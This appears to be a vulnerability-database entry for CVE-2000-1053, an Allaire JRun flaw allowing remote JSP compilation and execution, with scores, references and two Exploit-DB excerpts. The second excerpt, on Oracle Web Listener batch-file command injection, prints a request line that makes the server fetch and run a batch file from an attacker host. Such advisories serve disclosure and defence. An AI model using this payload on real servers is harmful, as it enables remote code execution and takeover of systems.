CVE-2000-1053
Published: 2000-12-11
Priority P4 · 31 · critical · 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 5.99% (92.4th percentile)
Allaire JRun 2.3.3 server allows remote attackers to compile and execute JSP code by inserting it via a cross-site scripting (CSS) attack and directly calling the com.livesoftware.jrun.plugins.JSP JSP servlet.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| macromedia | jrun | — | — |
No detection rules found.
Exploit-DB
Allaire JRun 2.3 - Arbitrary Code Execution
exploitdb·2000-10-23
CVE-2000-1053 Allaire JRun 2.3 - Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/1831/info
Jrun contains a vulnerability that allows a user to compile and execute JSP code from an arbitrary file on the webserver's filesystem. This bug is due to the way JSP execution is invoked -- if a requested filename/path is prefixed with '/servlet/'. If a user specifies "../" paths as part of a "/servlet/" request, it is possible to access documents outside of the webroot.
The document specified (the complete path must be known by the attacker) will then be compiled and executed as a JSP script. This can be a serious vulnerability if an attacker can send user-input to a file on the filesystem. An example of this is a guestbook application - a malicious user could put JSP code into a guest
Exploit-DB
Oracle Web Listener 4.0.x - for NT Batch File
exploitdb·2000-03-15
CVE-2000-0169 Oracle Web Listener 4.0.x - for NT Batch File
---
source: https://www.securityfocus.com/bid/1053/info
Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default.
Any of these batch files can be used to run arbitrary commands on the server, simply by appending '?&' and a command to the filename. The command will be run at the SYSTEM level. The name of a batch file is not even necessary, as it will translate the '*' character and apply the appended string to every batch file in the directory. Moreover, UNC paths can be used to cause the server to download and execute remote code.
http: //target/ows-bin/*.bat?&\\attacker\getadmin.bat
No writeups or analysis indexed.
References
http://marc.info/?l=bugtraq&m=97236125107957&w=2
http://www.allaire.com/handlers/index.cfm?ID=17969&Method=Full
https://exchange.xforce.ibmcloud.com/vulnerabilities/5406
Published: 2000-12-11